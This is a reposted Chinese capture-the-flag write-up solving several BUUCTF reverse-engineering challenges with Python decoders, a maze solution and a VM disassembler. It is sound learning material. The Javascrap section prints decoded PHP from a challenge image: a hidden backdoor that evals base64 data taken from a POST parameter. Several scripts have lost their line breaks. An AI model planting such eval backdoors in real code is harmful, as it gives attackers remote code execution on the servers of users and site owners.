码上快乐

相关内容   简体   繁体

BUUCTF Re部分wp(五)

本文转载自  查看原文  2020-06-08 21:25  530    BUUCTF Re

[SWPU2019]ReverseMe

32exe,拖进ida

 要求输入为32长度,

 此处进行了一次异或,值为SWPU_2019_CTF

 此处将异或处理后的数据存入另一地址,找到它下断

 继续跑,

此处又进行了第二次异或,并且又换了地址,再次找到它下断,

此处判断了数据,写脚本

a="SWPU_2019_CTF" b="86 0C 3E CA 98 D7 AE 19 E2 77 6B A6 6A A1 77 B0 69 91 37 05 7A F9 7B 30 43 5A 4B 10 86 7D D4 28" b=b.split() c="B3 37 0F F8 BC BC AE 5D BA 5A 4D 86 44 97 62 D3 4F BA 24 16 0B 9F 72 1A 65 68 6D 26 BA 6B C8 67" c=c.split() for i in range(len(b)): c[i]=eval("0x"+c[i])^eval("0x"+b[i]) for i in range(len(c)): c[i]=c[i]^ord(a[i%len(a)]) for i in c: print(chr(i),end="")

[ACTF新生赛2020]Oruga

迷宫题,只有在碰到障碍时才能换方向

1111*1111111****
111**111**111111
11111111**1**111
111*1**1**1**111
111*1**1**1*1111
11**1**1111*1111
11111**1111*1111
*111111111111111
111111111111*111
111111***111*111
1111111***1111**
111*1*1*1*1111*1
11111111111111**
****1*1*1*1111*1
1*1*1*1*1*1111*1
1*1*1*1*1*#111**

WEMEWEMJWEMJW

[FlareOn1]Bob Doge

这一上我还以为要逆安装程序,结果是安装完的程序。。。

c#,dnspy打开,找到decode,在下图处下个断

  

得到flag

[FlareOn2]very_success

32exe,应该是用汇编写的

这里很有意思,这个pop把返回地址压入eax

进sub_401084,

压入的地址被作为数据进行比对,其中加法用的是adc,v10是cf的值,在这里为一

a="AF AA AD EB AE AA EC A4 BA AF AE AA 8A C0 A7 B0 BC 9A BA A5 A5 BA AF B8 9D B8 F9 AE 9D AB B4 BC B6 B3 90 9A A8" a=a.split() for i in range(len(a)): a[i]=eval("0x"+a[i]) a=a[::-1] flag="" c=0
for i in a: b=(1<<(c&0x3)) flag+=chr((i-1-b)^0xc7) c+=i print(flag)

[FlareOn1]Javascrap

这题看了半天那个html文件,结果图片才是题目。。。

图片后面有东西,提出来大概是php,(为什么是大概,因为我不会php)

''' <?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"); $order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47); $do_me=""; for($i=0;$i<count($order);$i++){ $do_me=$do_me.$terms[$order[$i]]; } eval($do_me); ?>
''' terms=["M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"] order=[59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47] do_me=""
for i in range(len(order)): do_me+=terms[order[i]] print(do_me)

得到

$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

看着像base64,解密

if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }$code=base64_decode($_);eval($code);

post里的值就是flag

[FlareOn1]Shellolololol

32exe,拖进od,程序跳到了栈里运行

程序里有好几个这样的部分,直接在数据窗口看esi指向地址的变化就能找到flag

[HDCTF2019]MFC

这题参考了https://bbs.pediy.com/thread-250802.htm

MFC,vmp壳

用xspy

有个OnMsg:0464

#include<stdio.h> #include<windows.h>

int main(void) { HWND h = FindWindowA(NULL, "Flag就在控件里"); SendMessage(h, 0x464, NULL, NULL); return 0; }

 解des得到flag

[XMAN2018排位赛]easyvm

mach-o 栈虚拟机 没去符号还是比较好看的

 

 

 写脚本

op="05 01 0B 13 03 03 13 00 00 13 04 04 28 0C 00 33 14 00 20 05 09 01 11 09 00 0B 0A 09 01 04 0A 1B 05 04 0C 03 01 24 03 20 28 13 00 00 07 08 05 0E 08 E0 07 02 08 09 0A 02 01 00 0A 18 00 E0 1E 00 05 01 04 00 13 03 03 28 09 0A 02 01 00 0A 18 00 1F 20 00 03 1B 05 00 07 08 05 0E 08 E0 07 02 08 09 0A 02 01 00 0A 18 00 E0 1E 00 05 1D 05 0A 0D 0A 00 1B 05 0A 0C 03 01 24 03 1F 28 09 0A 02 01 00 0A 18 00 1F 20 00 03 0D 00 04 1B 05 00 13 03 03 03 04 0D 28 07 08 05 0E 08 E0 07 02 08 09 0A 02 01 00 0A 1B 05 00 01 00 04 0D 00 03 1D 05 0A 13 0A 00 1B 05 0A 22 04 08 0C 03 01 24 03 20 28 13 03 03 13 04 04 05 01 0C 28 05 09 01 11 09 03 0B 0A 09 01 00 0A 1B 05 00 07 08 05 0E 08 DF 09 0A 08 1D 05 00 1B 05 00 27 00 0A 17 04 07 0C 03 01 24 03 20 28 2A " op=op.split() for i in range(len(op)): op[i]=eval("0x"+op[i]) v21=0
for i in range(len(op)): v24 = op[v21] v21+=1 v23 = v24 & 0xFE v22 = v24 & 1
    if v23==0: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"mov((int *)(&v25)["+str(v8)+"], (unsigned int)*(&v25)["+str(v7)+"])") else: print(str(i)+"mov((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==2: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"mov32((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"mov32((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==4: if v22 == 1: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1 print(str(i)+"lea_ch((&v25)["+str(v8)+"], *(&v25)["+str(v7)+"])") if v23==6: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"lea_int((int **)(&v25)["+str(v8)+"], (int *)*(&v25)["+str(v7)+"])") if v23==8: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"ldr_int((int *)(&v25)["+str(v8)+"], (int *)*(&v25)["+str(v7)+"])") if v23==10: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"ldr_ch((int *)(&v25)["+str(v8)+"], *(&v25)["+str(v7)+"])") if v23==12: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"add((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"add((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==14: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"add_pint((int **)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"add_pint((int **)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==16: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"add_pch((&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"add_pch((&v25)["+str(v8)+"], "+str(v7)+")") if v23==18: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"my_xor((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"my_xor((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==20: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22==0: print(str(i)+"mod((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==22: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"my_or((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"my_or((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==24: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"my_and((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"my_and((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==26: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"push((int **)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: push(str(i)+"(int **)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==28: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"pop((int **)(&v25)["+str(v8)+"], (int *)(&v25)["+str(v7)+"])") if v23==30: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"shr((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"shr((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==32: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"shl((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"shl((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==34: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"ror((int *)(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"ror((int *)(&v25)["+str(v8)+"], "+str(v7)+")") if v23==36: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"v11 = cmpl((int)*(&v25)["+str(v8)+"], (int)*(&v25)["+str(v7)+"])") else: print(str(i)+"v11 = cmpl((int)*(&v25)["+str(v8)+"], "+str(v7)+")") if v23==38: v8 = op[v21] v21+=1 v7 = op[v21] v21+=1
        if v22 == 1: print(str(i)+"v10 = cmpeq((unsigned int)*(&v25)["+str(v8)+"], (unsigned int)*(&v25)["+str(v7)+"])") else: print(str(i)+"v10 = cmpeq((unsigned int)*(&v25)["+str(v8)+"], "+str(v7)+")") if v23==40: print("loop") """         if inloop==1: if v11==1: v21 = v20 else: inloop = 0
        else: inloop = 1 v20 = v21 """    
    if v23==42: '''         if v17==1: print("fail...\n") else: print("success!!\n") '''         break
    
    else: continue

得到

0lea_ch((&v25)[1], *(&v25)[11]) 1my_xor((int*)(&v25)[3], (int)*(&v25)[3]) 2my_xor((int*)(&v25)[0], (int)*(&v25)[0]) 3my_xor((int*)(&v25)[4], (int)*(&v25)[4]) loop //for 0 to 32:
5add((int*)(&v25)[0], 51)                                        // a+=51%32
6mod((int*)(&v25)[0], 32)                                        // c[i]=flag[a]
7lea_ch((&v25)[9], *(&v25)[1])                                    //    
8add_pch((&v25)[9], (int)*(&v25)[0]) 9ldr_ch((int*)(&v25)[10], *(&v25)[9]) 10mov((int*)(&v25)[4], (unsigned int)*(&v25)[10]) 11push((int**)(&v25)[5], (int)*(&v25)[4]) 12add((int*)(&v25)[3], 1) 13v11 = cmpl((int)*(&v25)[3], 32) loop 15my_xor((int*)(&v25)[0], (int)*(&v25)[0]) 16lea_int((int**)(&v25)[8], (int*)*(&v25)[5]) 17add_pint((int**)(&v25)[8], 224) 18lea_int((int**)(&v25)[2], (int*)*(&v25)[8]) 19ldr_int((int*)(&v25)[10], (int*)*(&v25)[2]) 20mov((int*)(&v25)[0], (unsigned int)*(&v25)[10]) 21my_and((int*)(&v25)[0], 224) 22shr((int*)(&v25)[0], 5) 23mov((int*)(&v25)[4], (unsigned int)*(&v25)[0]) 24my_xor((int*)(&v25)[3], (int)*(&v25)[3]) loop //for 0 to 31 
26ldr_int((int*)(&v25)[10], (int*)*(&v25)[2])                //x1&0x1f<<3+x2&0xe0>>5 
27mov((int*)(&v25)[0], (unsigned int)*(&v25)[10])            //上下两段是第32个
28my_and((int*)(&v25)[0], 31) 29shl((int*)(&v25)[0], 3) 30push((int**)(&v25)[5], (int)*(&v25)[0]) 31lea_int((int**)(&v25)[8], (int*)*(&v25)[5]) 32add_pint((int**)(&v25)[8], 224) 33lea_int((int**)(&v25)[2], (int*)*(&v25)[8]) 34ldr_int((int*)(&v25)[10], (int*)*(&v25)[2]) 35mov((int*)(&v25)[0], (unsigned int)*(&v25)[10]) 36my_and((int*)(&v25)[0], 224) 37shr((int*)(&v25)[0], 5) 38pop((int**)(&v25)[5], (int*)(&v25)[10]) 39add((int*)(&v25)[10], (int)*(&v25)[0]) 40push((int**)(&v25)[5], (int)*(&v25)[10]) 41add((int*)(&v25)[3], 1) 42v11 = cmpl((int)*(&v25)[3], 31) loop 44ldr_int((int*)(&v25)[10], (int*)*(&v25)[2]) 45mov((int*)(&v25)[0], (unsigned int)*(&v25)[10]) 46my_and((int*)(&v25)[0], 31) 47shl((int*)(&v25)[0], 3) 48add((int*)(&v25)[0], (int)*(&v25)[4]) 49push((int**)(&v25)[5], (int)*(&v25)[0]) 50my_xor((int*)(&v25)[3], (int)*(&v25)[3]) 51mov32((int*)(&v25)[4], (int)*(&v25)[13]) loop //for 0 to 32
53lea_int((int**)(&v25)[8], (int*)*(&v25)[5])                    // x^(?+i)
54add_pint((int**)(&v25)[8], 224)     55lea_int((int**)(&v25)[2], (int*)*(&v25)[8]) 56ldr_int((int*)(&v25)[10], (int*)*(&v25)[2]) 57mov((int*)(&v25)[0], (unsigned int)*(&v25)[10]) 58push((int**)(&v25)[5], (int)*(&v25)[0]) 59mov((int*)(&v25)[0], (unsigned int)*(&v25)[4]) 60add((int*)(&v25)[0], (int)*(&v25)[3]) 61pop((int**)(&v25)[5], (int*)(&v25)[10]) 62my_xor((int*)(&v25)[10], (int)*(&v25)[0]) 63push((int**)(&v25)[5], (int)*(&v25)[10]) 64ror((int*)(&v25)[4], 8) 65add((int*)(&v25)[3], 1) 66v11 = cmpl((int)*(&v25)[3], 32) loop 68my_xor((int*)(&v25)[3], (int)*(&v25)[3]) 69my_xor((int*)(&v25)[4], (int)*(&v25)[4]) 70lea_ch((&v25)[1], *(&v25)[12]) loop 72lea_ch((&v25)[9], *(&v25)[1]) 73add_pch((&v25)[9], (int)*(&v25)[3]) 74ldr_ch((int*)(&v25)[10], *(&v25)[9]) 75mov((int*)(&v25)[0], (unsigned int)*(&v25)[10]) 76push((int**)(&v25)[5], (int)*(&v25)[0]) 77lea_int((int**)(&v25)[8], (int*)*(&v25)[5]) 78add_pint((int**)(&v25)[8], 223) 79ldr_int((int*)(&v25)[10], (int*)*(&v25)[8]) 80pop((int**)(&v25)[5], (int*)(&v25)[0]) 81push((int**)(&v25)[5], (int)*(&v25)[0]) 82v10 = cmpeq((unsigned int)*(&v25)[0], (unsigned int)*(&v25)[10]) 83my_or((int*)(&v25)[4], (int)*(&v25)[7]) 84add((int*)(&v25)[3], 1) 85v11 = cmpl((int)*(&v25)[3], 32) loop

关键加密其实就是比特流循环左移三位

cmp="75 85 D1 39 0B 29 CD 77 6D 9F 73 23 61 8B 4D 45 9D 8F 5B 11 C1 C9 E5 CF 45 E5 B1 B3 41 D9 CF CF " v2=[0xde,0xad,0xbe,0xef] cmp=cmp.split() for i in range(len(cmp)): cmp[i]=eval("0x"+cmp[i]) f=[] for i in range(32): f.append(0) for i in range(32): cmp[i]=(cmp[i]^(v2[i%4]+i)) t=cmp[31] for i in range(31): f[i+1]=((cmp[i+1]&0xf8)>>3)+((cmp[i]&0x7)<<5) f[0]=((cmp[0]&0xf8)>>3)+((t&0x7)<<5) flag=[] a=0
for i in range(32): flag.append(0) for i in range(32): a+=51 a=a%32 flag[a]=f[i] for i in range(32): print(chr(flag[i]),end="")

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 BUUCTF Re部分wp(六) BUUCTF Re部分wp(一) BUUCTF Re部分wp(八) BUUCTF 部分wp BUUCTF MISC部分题目wp BUUCTF CRYPTO部分题目wp BUUCTF PWN部分题目wp BUUCTF[NPUCTF2020] web 部分WP wp | re | 2021祥云杯 逆向部分 2019 安洵杯 Re 部分WP
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM